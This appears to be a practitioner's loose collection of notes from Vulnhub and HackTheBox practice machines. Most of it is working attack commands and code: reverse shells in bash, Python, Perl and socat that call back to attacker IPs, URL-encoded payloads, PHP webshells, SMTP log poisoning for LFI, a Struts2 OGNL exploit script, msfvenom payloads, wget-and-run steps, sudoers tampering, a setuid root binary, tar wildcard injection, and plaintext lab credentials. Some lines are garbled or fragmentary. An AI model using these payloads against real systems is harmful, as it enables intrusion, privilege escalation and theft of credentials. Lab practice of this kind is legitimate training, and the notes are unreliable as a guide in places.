My Practice on Vulnhub boxes
netdiscover -r ip nmap -p- -sV ip /pChart2.1.3/index.php - vulnerable - searcsploit lfi
Since we have an LFI and we know that the server is running Apache, let’s search for the apache config file. After checking this, I managed to find the httpd.config file.
usr/local/etc/apache22/httpd.conf
/phptax
This script drops an rce.php webshell into the /phptax/data/ directory.
mkfifo pipe;nc 192.168.15.141 1234<pipe|/bin/sh>pipe 2>pipe;rm pipe
/rce.php?cmd=nc 192.168.15.141 1234 > php-reverse-shell.php
uname -a shows the host is FreeBSD 9.0 release.
nc -lvp 1234 < 26368.c
nc 192.168.15.141 1337 > 26368.c
gcc -o 26368 26368.c
===================================================
netdiscover -r ip
nmap -p- -sS -A ip
Great, we got many services running, notables are:
Port 22: SSH Port 25: SMTP Port 79: Finger Port 110: POP3 Port 111: RPCbind Port 143: IMAP Port 512: RSH (Remote shell) Port 513: RLogin Port 514: shell?
enum4linux
nc -nv ip 25 VRFY vulnix VRFY abatchy
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.1.72
finger [email protected]
NFS service - 2069
showmount ip
showmount -e ip
mkdir /tmp/nfs
mount -r nfs ip:/home/vulnix /tmp/nfs -nolock
gaining access through ssh
hydra -l user -P rockyou.txt ip ssh -t 4
id vulnix
useradd -u 2008 vulnix
mount -t nfs ip:/home/vulnix /tmp/mnt -nolock
Let’s generate keys for SSH so we can login into vulnix!
Create ssh key pair by running ssh-keygen. Create .ssh directory on the mounted share /home/vulnix/.ssh. Copy the content of the public key to /home/vulnix/.ssh. SSH into [email protected]victim_ip
Also due to the fact that there’s a secure_path set, we can’t manipulate the PATH variable (except by running sudo -e which we can’t).
Let’s edit the file and update /home/vulnix so we’re able to
Restart the VM and remount the shared directory. We can upload a local exploit to gain root, or just copy /bin/bash and give it setuid permissions.
We’ll run bash with -p flag to keep the original file’s permissions.
mount -t nfs 192.168.1.72:/home/vulnix /tmp/mnt
cp /bin/bash . chmod 4777 bash
ls -al ./bash -p
mkdir mnt && mount 192.168.22.134:/home/vulnix mnt -o vers=3
useradd -u 2008 vulnix
ssh -i id_rsa [email protected]
By using sudoedit /etc/exports, it’s possible to add another share into the export list, one which uses the no_squash_root option; which prevents root users being remapped to the nobody user:
/home/vulnix (rw,root_squash) /root (rw,no_root_squash)
mount 192.168.22.134:/root mnt -o vers=3
nmap -sT -sV -A -O -v -p 1-65535 192.168.1.33
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.1.33
Port 111 — Enumerating RPC — rpcbind 2–4 RPC service is running, so we can enumerate further using rpcinfo. [email protected]:~# rpcinfo -p 192.168.1.33
nmap -sU -sT -p 2049 192.168.1.33
$ apt-cache search showmount nfs-common - NFS support files common to client and server $ apt-get install nfs-common
Enumeration is important, without knowing there’s a user called user you most likely won’t be able to solve this VM. Doesn’t matter which service you use, you can enumerate SMTP, Finger, NFS, …
showmount --exports 192.168.1.33 Export list for 192.168.1.33: /home/vulnix * Lets mount the remote share on our local machine. [email protected]:~# mkdir /tmp/nfs [email protected]:~# mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs
useradd -u 2008 vulnix [email protected]:~# tail -1 /etc/passwd vulnix:x:2008:2008::/home/vulnix:/bin/sh [email protected]:~# su vulnix $ id uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix) $ cd /tmp/nfs $ ls -la total 20 drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 . drwxrwxrwt 15 root root 4096 May 16 18:17 .. -rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout -rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc -rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile $ pwd /tmp/nfs
ls /root/.ssh/ [email protected]:~# ssh-keygen
[email protected]:~# mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs [email protected]:~# cp /bin/bash /tmp/nfs/ [email protected]:~# cd /tmp/nfs/ [email protected]:/tmp/nfs# ls -la
-=======================================
nmap to find ports and services
smtp find usernames with enum sccripts with metasploit wordlists unix_users.txt
finger to validate users
showmount -e ip - to validate the shared follders
rpcinfo ip - to validate the running services (nfs found) 2049
now mounting the folder in to local machine but it shows access denied , as well we got the suid with other command
mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs - access denied
mkdir mnt && mount 192.168.22.134:/home/vulnix mnt -o vers=3 - got some output 2008 suid
create a ssh key and upload it on server pub key on /tmp/mnt
echo 'key' > authorized_keys
login with vulnix
*for ssh bruteforcing we did hydra bruteforce with the following commnad hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.78.130 ssh -t 4
check the user uid - id vulnix*
=======
for shell ssh -i id_rsa -l vulnix 192.168.78.130
[email protected]:/# mount -t nfs 192.168.78.130:/ -o vers=2 mount
cc614640424f5bd60ce5d5264899c3be
=========================================================
nmap -Pn ip - becuase icmp block the ip
22 80 port found this box
test directory found
curl -X -v OPTIONS ip/test
found put,delete method working on the box
PUt file upload shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.78.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
echo '#!/bin/bash' > update echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.78.128 443 >/tmp/f' >> update
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
mywriteup-
sickos - chkrootkit vulnerability cron jobs
nmap -Pn ip - becuase icmp block the ip
22 80 port found this box
test directory found
curl -X -v OPTIONS ip/test
found put,delete method working on the box
PUt file upload shell
with nmap script nmap -p 80 ip --script http-put --script-args http-put.url='/test/php.php' ,http-put..file='put.php'
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.78.128 443 >/tmp/f' >> update
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update - this is for add user in to sudoers list
perl -e \’use Socket;$i=”192.168.209.151″;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};\’
echo “perl -e ‘use Socket;$i=\”192.168.209.151\”;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\”tcp\”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\”>&S\”);open(STDOUT,\”>&S\”);open(STDERR,\”>&S\”);exec(\”/bin/sh -i\”);};'” > /tmp/update
for root - above reverse shell
with curl low priv shell
curl "http://192.168.78.131/test/shell.php?cmd=python+-c+%27import+socket%2csubprocess%2 cos%3bs%3dsocket.socket(socket.AF_INET%2csocket.SOCK_STREAM)%3bs.connect((%22192.168.78.128%22%2c443))%3bos.dup2(s.f ileno()%2c0)%3b+os.dup2(s.fileno()%2c1)%3b+os.dup2(s.fileno()%2c2)%3bp%3dsubprocess.call(%5b%22%2fbin%2fsh%22%2c%22- i%22%5d)%3b%27"
============================================
linux permissions r = read permission w = write permission x = execute permission
- = no permission
Number Permission Type Symbol 0 No Permission --- 1 Execute --x 2 Write -w- 3 Execute + Write -wx 4 Read r-- 5 Read + Execute r-x 6 Read +Write rw- 7 Read + Write +Execute rwx
'764' absolute code says the following:
Owner can read, write and execute Usergroup can read and write World can only read
u user/owner g group o other a all
- Adds a permission to a file or directory
- Removes the permission= Sets the permission and overrides the permissions set earlier.
Changing Ownership and Group For changing the ownership of a file/directory, you can use the following command:
chown user
In case you want to change the user as well as group for a file or directory use the command
chown user:group filename
User rights/Permissions The first character that I marked with an underscore is the special permission flag that can vary. The following set of three characters (rwx) is for the owner permissions. The second set of three characters (rwx) is for the Group permissions. The third set of three characters (rwx) is for the All Users permissions. Following that grouping since the integer/number displays the number of hardlinks to the file. The last piece is the Owner and Group assignment formatted as Owner:Group.
==============================================
one method: nmap -sC -sV 10.10.10.157
dirb ip
monitoring
change request in to post method
centreon post request api/
centreon/api/index.php?action=authenticate
hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "/centreon/api/index.php?action=authentication:username=^USER^&password=^PASS^:Bad Credentials" -V
python -c 'import pty; pty.spawn("/bin/bash")'
on victim attacekr mode socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
on kali listen mode socat file:
tty
,raw,echo=0 tcp-listen:4444wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
suid find / -perm /4000
screen 4.5.0 has suid bit
wfuzz -c -X POST -d "username=admin&password=FUZZ" -w ./darkweb2017-top10000.txt http://wall.htb/centreon/api/index.php?action=authenticate
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f
==================================================================================
nmap -v -p 1-65535 -sV -O -sT 192.168.221.150
decode the image and got the password
keKkeKKeKKeKkEkkEk
PHP reverse shell The file name shell.php.png was used to bypass the web application filtering, the file was still executed as PHP (likely due to incorrectly configured Apache MIME types). A reverse shell successfully connected back to a netcat listener.
echo "/usr/bin/../../bin/chmod -R 777 /home/admin" > /tmp/runthis
cat cryptpass.py
import base64,codecs,sys
def encodeString(str): base64string= base64.b64encode(str) return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1]) print cryptoResult
python script to decrypt the password
import base64,codecs,sys
def encodeString(str): base64string= base64.b64encode(str) return codecs.encode(base64string[::-1], 'rot13')
def decodeString(str): string = str[::-1] string = string.encode("rot13") return base64.b64decode(string)
print decodeString(sys.argv[1])
sudo -u fristi .secret_admin_stuff/doCom /bin/sh
php reverse shell upload and get back to the nc
echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
3rd method
/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.0.3",5556));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
import base64,codecs,sys
def encodeString(str): base64string= base64.b64encode(str) return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1]) print cryptoResult
decode string
import base64,codecs,sys
def decodeString(str): base64string= codecs.decode(str, 'rot13') return base64.b64decode(base64string[::-1])
cryptoResult=decodeString(sys.argv[1]) print cryptoResult
[[email protected] ~]$ python decryptpass.py $(cat whoisyourgodnow.txt) LetThereBeFristi! [[email protected] ~]$ su fristigod Password: bash-4.1$ whoami fristigod
sudo -u fristi ./doCom /bin/bash
import base64 in_string = "=RFn0AKnlMHMPIzpyuTI0ITG" in_string_1 = in_string[::-1] in_string_2 = in_string_1.encode("rot13") print base64.b64decode(in_string_2) LetThereBeFristi!
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
==================================================================
nmap -sT -sV -A -O -v -p 1-65535 192.168.1.30
bash-4.1$ sudo -u fristi ./doCom whoami
==========================================================
11/12/2019
192.168.30.0/24 192.168.40.0/24
kali <---------------> straylight <---------------> neuromancer (.128) (.129) (.128) (.129)
nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.30.129
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -t 20 -u http://192.168.30.129/
Hmm. What do we have here? /freeside/ looks interesting.
There’s another web-related port, 3000/tcp and ntopng is running behind it.
/turing-bolo/ has something that finally looks like an attack surface.
PHP Injection There’s a Local File Inclusion (LFI) vulnerability with the bolo parameter in bolo.php, demonstrated below.
All four files case.log, molly.log, armitage.log, and riviera.log are available on the server, indicating the presence of the LFI vulnerability.
How can I inject PHP into the server?
A quick search in Google for “postfix log location” seems to suggest the logs are at /var/log/mail.log. This plays well into our hands because of the .log extension. Let’s explore this path of attack. ip/bolo.php?bolo=../../../../var/log/mail
<?php echo shell_exec($_GET['cmd']);?>
nc ip 25 Helo hackerman MAIL FROM: "hackerman <?php echo shell_exec($_GET['cmd']);?>"
[email protected]:~# nc 192.168.56.102 25 220 straylight ESMTP Postfix (Debian/GNU) MAIL FROM:[email protected] 250 2.1.0 Ok RCPT TO:<?php echo system($_POST['cmd']); ?> 501 5.1.3 Bad recipient address syntax
perl -e 'use Socket;$i="192.168.30.128";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
After encoding
perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.30.128%22%3B%24p%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fbash%20-i%22%29%3B%7D%3B%27
Long story short. I notice /bin/screen is a symbolic link to /bin/screen-4.5.0, which is setuid to root. Like they always say, Google is your best friend.
41154 - 4.5 screen
now move to next machine /structs2_2.3
Next Attack: Neuromancer
nc and socat are available on the machine
for port scanning
for p in $(seq 1 65535); do nc -nvzwl ip $p 2>&1; done| grep open >&1; done | grep open5); do nc -nvzw1 ip $p 2>
socat tcp-listen:8009,fork tcp:192.168.40.129:8009 &
socat tcp-listen:8080,fork tcp:192.168.40.129:8080 &
socat tcp-listen:34483,fork tcp:192.168.40.129:34483 &
netstat -plunt
from attacker machine
socat tcp-listen:4321,fork tcp:192.168.30.128:4321 &
Struts2 Showcase Remote Command Execution
exploit.sh
!/bin/bash
LHOST=192.168.30.128 LPORT=4321 RHOST=192.168.30.129 RPORT=8080 TARGETURI=struts2_2.3.15.1-showcase/integration URL=http://$RHOST:$RPORT/$TARGETURI/saveGangster.action CMD="$1" PAYLOAD="" PAYLOAD="${PAYLOAD}%{" PAYLOAD="${PAYLOAD}(#[email protected]@DEFAULT_MEMBER_ACCESS)." PAYLOAD="${PAYLOAD}(#_memberAccess?(#_memberAccess=#dm):" PAYLOAD="${PAYLOAD}((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." PAYLOAD="${PAYLOAD}(#ognlUtil=#container.getInstance(@[email protected]))." PAYLOAD="${PAYLOAD}(#ognlUtil.getExcludedPackageNames().clear())." PAYLOAD="${PAYLOAD}(#ognlUtil.getExcludedClasses().clear())." PAYLOAD="${PAYLOAD}(#context.setMemberAccess(#dm))))." PAYLOAD="${PAYLOAD}(@[email protected]().exec('$CMD'))" PAYLOAD="${PAYLOAD}}"
usage() { echo "Usage: $(basename $0) [COMMAND]" >&2 exit 1 }
if [ $# -ne 1 ]; then usage fi
curl -s -H "Referer: http://$RHOST:$RPORT/$TARGETURI/editGangster" --data-urlencode "name=$PAYLOAD" --data-urlencode "age=20" --data-urlencode "__checkbox_bustedBefore=true" --data-urlencode "description=1" -o /dev/null $URL
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.40.128 LPORT=4321 -f elf -o rev
./exploit.sh "wget -O /tmp/rev ip:port/rev"
got the shell now priv esccalation
for superior shell
ssh -i /root/keys/ta -p 34483 [email protected]
php://filter/convert.base64-encode/resource=case
[email protected]:~# nc 192.168.56.102 25 220 straylight ESMTP Postfix (Debian/GNU) MAIL FROM:[email protected] 250 2.1.0 Ok RCPT TO:<?php echo system($_POST['cmd']); ?> 501 5.1.3 Bad recipient address syntax
[email protected]:~# curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=id"
[email protected]:~# curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=which nc"
[email protected]:~# curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=nc 192.168.56.101 4444 -e /bin/bash"
$ python -c "import pty;pty.spawn('/bin/bash')"
[email protected]:/var/www/html/turing-bolo$ find / -perm -u=s 2>/dev/null
db.com/exploits/41154, which I saved on my machine as exploit.sh and transferred to the target
[email protected]:~# nc -nvlp 2222 < exploit.sh [email protected]:/var/www/html/turing-bolo$ cd /tmp [email protected]:/tmp$ nc 192.168.56.101 2222 > exploit.sh
python -c "import pty;pty.spawn('/bin/bash')"
[email protected]:/etc#
[email protected]:/tmp# for i in $(seq 1 255); do ping -c 1 192.168.212.$i; done | grep "bytes from"
[email protected]:/tmp# for i in $(seq 1 65535); do nc -nvz -w 1 192.168.212.4 $i 2>&1; done | grep -v "Connection refused"
[email protected]:/tmp# socat TCP-LISTEN:8009,fork,reuseaddr TCP:192.168.212.4:8009 & [1] 14514 [email protected]:/tmp# socat TCP-LISTEN:8080,fork,reuseaddr TCP:192.168.212.4:8080 & [2] 14521 [email protected]:/tmp# socat TCP-LISTEN:34483,fork,reuseaddr TCP:192.168.212.4:34483 & [3] 14524
[email protected]:/tmp# socat TCP-LISTEN:6666,fork,reuseaddr TCP:192.168.56.101:6666 &
[email protected]:~# python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "nc 192.168.212.3 6666 -e /bin/bash" not work
And then setup a file in /var/www/html called callback.sh which contained
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.212.3 6666 >/tmp/f
[email protected]:~# python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "wget http://192.168.212.3:8888/callback.sh -O /tmp/callback.sh"
for permission [email protected]:~# python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "chmod +x /tmp/callback.sh"
fired
[email protected]:~# python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "sh /tmp/callback.sh"
got the shell now move to priv escalation
uname -a
It wasn't there, so I downloaded the exploit to /var/www/html on my machine as priv.c and compiled it locally
[email protected]:~# gcc priv.c -o priv
====================================================================================
This is a command interpreter (shell). So by running sudo ash we can get a root shell.
whoami;id
AWK is a special-purposeprogramming language designed for text processing and typically used as a data extraction and reporting tool. Since we can run awk using we sudo, we can easily escalate our privileges to root.
Bash is a Unix shell and command language. As with ash we can abuse our sudo rights to privesc.
[email protected]:~$ sudo bash
The Bourne shell (sh) is a shell, or command-line interpreter, for computer operating systems.
The C shell (csh or the improved version, tcsh) is a Unix shell. As with for example sh we can use it to escalate to root.
We can abuse curl in order to overwrite files as root. By creating a simple setuid binary on my machine, using curl to fetch the program and overwriting an already setuid binary owned by root on the target system, we can get a root shell.
Setuid binary
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
Compile this program and start a python SimpleHTTPServer and go to the victim machine and fetch the file using curl.
Dash is an acronym for Debian Almquist shell (dash). It is a Unix and Linux shell which is much smaller than bash but still aiming at POSIX-compliancy. As with sh, bash etc. we just sudo dash and get a root shell.
ed is a line-oriented text editor. It is used to create, display, modify and otherwise manipulate text files. But can also execute commands from inside ed. Beacuse of this, root shell is really straight forward.
env is a shellcommand for Linux, Unix, and Unix-like operating systems. It can be used to print a list of the current environment variables, or to run another program in a custom environment without modifying the current one.
Expect is a program that "talks" to other interactive programs according to a script. Following the script, expect knows what can be expected from a program and what the correct response should be.
Find is a command for recursively filtering objects in the file system based on a simple conditional mechanism. You can use find to search for a file or directory on your file system. Find do also have an exec parameter which we can abuse to escalate our privileges.
By issuing the command ftp without any parameters, we can run commands from within ftp.
We can execute commands from inside less. sudo less /etc/profile !/bin/sh
As above, we can execute commands from inside of man.
[email protected]:~$ sudo more /var/log/lastlog !/bin/sh
scp allows files to be copied to, from, or between different hosts. It uses ssh for data transfer and provides the same authentication and same level of security as ssh.
[email protected]:~$ TF=$(mktemp)
[email protected]:~$ echo 'sh 0<&2 1>&2' > $TF
[email protected]:~$ chmod +x "$TF"
[email protected]:~$ sudo scp -S $TF x y:
# whoami;id
Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many different purposes - including giving us a root shell!
We can use the ProxyCommand option to spawn an interactive shell.
As with man etc. we can execute commands from inside of vi.
The Z Shell or zsh is an interactive UNIX shell and powerful command-line interpreter for scripting language including shell scripting. Since it's a interactive shell we can easily get a root shell.
Pico is a simple, display-oriented text editor based on the pine message composer.
Depending on how rvim was compiled, we can spawn a root shell. In this case rvim was compiled with Python support.
Since we can use perl with sudo, we can do the following to get a root shell.
Tclsh is a shell-like application that reads Tcl commands from its standard input or from a file and evaluates them.
We can abuse the help function of git to get code execution as root.
Script command records a shell session for you so that you can look at the output that you saw at the time and you can even record with timing so that you can have a real-time playback. It is really useful and comes in handy in the strangest kind of times and places.
But this can obviously be abused to get a root shell.
Enumerating the box we find the following script running as a cronjob.
#!/bin/bash
for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done
This is a backup script taking everything from a users home dir, compressing it using tar and saving it to /etc/backups.
The problem with tar is that when using wildcards an attacker can inject he's own arguments.
The following is taken from the man page (
man tar
):--checkpoint[=NUMBER] display progress messages every NUMBERth record (default 10) --checkpoint-action=ACTION execute ACTION on each checkpoint
echo "mkfifo /tmp/0wned; nc 192.168.1.142 1337 0</tmp/0wned | /bin/sh > /tmp/0wned 2>&1; rm /tmp/0wned" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
Now we setup a listener on our machine and wait for the cronjob to execute.
Looking at the home folders we see susan. Listing all files - including hidden files - we find .secret.
[email protected]:/home/susan$ cat .secret MySuperS3cretValue!
[email protected]:/home/susan$ su - susan Password: [email protected]:~$ whoami;id susan
Enmerating the machine for setuid binaries we find the following:
xxd is owned by root and the setuid bit is set. By running this program we will run in the context of root, possibly giving us a way to escalate our privileges. It can however only be ran by root or members of the group "itservices" - exactly the group susan is a member of!
Let's dump /etc/shadow!
Doing a nmap scan against the machine reveals that NFS is running. Let's first see if we can find any open shares which we can mount.
Awesome! Let's mount the share to /mnt/peter.
mount 192.168.1.140:/home/peter /mnt/peter
Looking at the UID and GID we see 1001/1005. This mean that I don't have that specific group and user on my system, so even if the share now is mounted I can't write files to the share.
To circumvent this, let's create a user with a UID of 1001 and a group with the GID 1005, and then change to that user and try to write a file.
So, how do we utilize this to escalate to peter? How about generating a SSH key and adding that to peter's authorized_keys? Let's try.
Let's first generate a new SSH key.
Now, let's create a .ssh directory inside peter's home directory (on the share) and add the public key we just generated to authorized_keys.
pwd mkdir .ssh touch .ssh/authorized_keys cat /home/peter/.ssh/id_rsa.pub > .ssh/authorized_keys ssh [email protected]
Looking at the groups peter is added to we see docker. This is a really powerful group and there's ton of information on the internet on how to privesc using the docker group.
The Docker Hub already have an image which we can use to get a root shell, called "rootplease".
===================================================================================
5th January
The end of the URL, “php?page=tools.html” looks like we could do some directory traversal with it. Let’s give it a shot and see if we can print out /etc/passwd.
searchsploit phpliteadmin
create a malicious database and got the shell
../../../usr/databases/shell.php
<?php system("whoami; wget http://192.168.55.4/shellme; chmod +x shellme; ./shellme"); ?>
msfvenom --platform Linux -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.55.4 LPORT=2501 -f elf -o shellme
python tty shell python -c 'import pty; pty.spawn("/bin/[email protected]:/$
we got the password of zico through wp-config.php
==========================================================
nmap -Pn -T4 -A ip
curl -v -X options ip/test/ - put method enabled
curl -v -X PUT -d '<?php system($_GET["cmd"]);?>' http://ip/test/shell.php
curl --upload-file /var/www/html/shell.php -H "Expect: *" 192.168.56.101/test/shell.php
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
After this i quickly googled for any chkrootkit related exploits and found this exploit-db;
chkrootkit
ls -lah /etc/cron* 2>/dev/null | grep chkrootkit
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
echo “perl -e ‘use Socket;\$i=\”192.168.209.151\”;\$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\”tcp\”));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\”>&S\”);open(STDOUT,\”>&S\”);open(STDERR,\”>&S\”);exec(\”/bin/sh -i\”);};'” > /tmp/update
cp /bin/bash /tmp/bash
chmod 4777 /tmp/bash
./bash -p
==========================================================
check liscence files
arbitraty file upload for builderengine
builderengine v3 exploit for user shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.129 LPORT=4444 -f raw > shell.php
dirty cow for local priv escalation
================================================
Using nmap to find opened ports & running services.
Detecting technologies used to build web apps.
Checking robots.txt file.
Searching & using public exploits.
Uploading shell to drupal CMS.
Creating reverse shell using ncat (nc).
Privilege escalation using SUID binaries.
Collect important information from PHP configuration files.
Cracking Linux credentials.
searchsploit drupal
upload reverse shell and back to the connection
find / -perm 4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find . -exec '/bin/sh' \;
find / -name flag*
find /root/thefinalflag.txt -type -type f -exec cat '{}' \;
===================================================
Wordpress exploit
wpscan --url ip -U users -P password
ssh [email protected] -p 7744
After escaping the restricted shell, we export “/bin/bash” as our SHELL environment variable and “/usr/bin” as our PATH environment variable so that we can run Linux commands properly.
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash:$SHELL
sudo -l
/usr/bin/git
sudo git help add
!/bin/bash
So, I tried to login to this SSH service using the extracted credentials and I succeeded. But I can not run any Linux command. This happened because the shell is restricted shell. So, I tried to escape it using VI editor.
vi
:set shell=/bin/sh
export PATH=$PATH:/bin:/usr/bin
====================================
Penetrating Methodology:
Discovering Targets IP
Network scanning (Nmap)
Surfing HTTP service port
Searching exploits via searchsploit
Using SQLMAP to dump databases information
Using John the Ripper to Crack the Password
Login into JOOMLA
Inject malicious PHP Reverse Shell Code
Using Netcat for obtaining reverse connection
Exploit the kernel
Getting root access
Reading Final flag
joomla sql injection
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump --batch
john hash
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt --force
After spending some time exploring, we got an idea to add a malicious PHP code (available inside kali: /usr/share/webshells/php) in index.php of beez3 template for getting reverse shell as shown below.
beez3 template -> reverse shell
In my journey, I came across an interesting page – Extensions > Templates
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
uname -a
lsb_release -a
ubuntu 16 exploit
cd /tmp
wget https://www.exploit-db.com/exploits/39772
unzip 39722.zip
ls
cd 39772
ls
tar -xvf exploit.tar
ls
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
ls
./doubleput
cd root
ls
cat the-flag.txt
(find / -perm -u=s -type f 2>/dev/null)
ntfs-3g
4.4.x
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
=======================================================
nmap -A 192.168.1.101
We Fired UP!! burpsuite using rockyou.txt to get valid login. Username- admin
After bruteforcing, we have found the password for Admin i.e Password- happy
command .php Let’s check out subdirectories in the /home directory. We have found 3 users i.e Charles, Jim and Sam.
old.passwords.bak
Username- jim Password- jibril04 ssh [email protected]
Username- Charles Password- ^xHhA&hvim0y
nc lvnp 4444
==================================================================
nmap -A 192.168.1.108
LFI
wfuzz -w /usr/share/wfuzz/wordlist/general/test.txt -w /usr/share/wordlist/injections/lfi.txt http://ip/thankyou.php?FUZZ=FUZZ
Therefore, I Quickly checked for LFI Vulnerability by obtaining the /etc/passwd file as shown below.
file=/var/log/ngnix/access.log Let’s capture the request of the Nginx Access log file using Burpsuite. Here we will be using LFI to exploit apache access log.
In place of the file path, we have injected a Code to get the command line access by making a GET request to the Server.
So, I tried to view many files like : /etc/passwd, /etc/shadow, & /var/log/nginx/access.log. I found that some of them can be viewed (passwd & access.log).
To verify that it is working or not, we have added a new parameter to the URL i.e &cmd=id. Therefore from the output, it confirms we have successfully executed the command on the server. /var/log/ngnix/error.log&cmd=id
gcc -fPIC -shared -ldl -o libhax.so libhax.c gcc -o rootshell rootshell.c
Screen exploit
==================================================
nmap -sn ip/24
nmap -A -p- ip
whatweb ip wpscan --url http://ip I found that there is an interesting directory called “ipdata” with directory listing option enabled.
After downloading, opening, and analyzing the file using wireshark, I found that it contains a request to the WordPress admin area. That request contains the credentials for the WordPress.
username : webdeveloper password : Te5eQg&4sB!Yr$)wf%(DcAd
ssh [email protec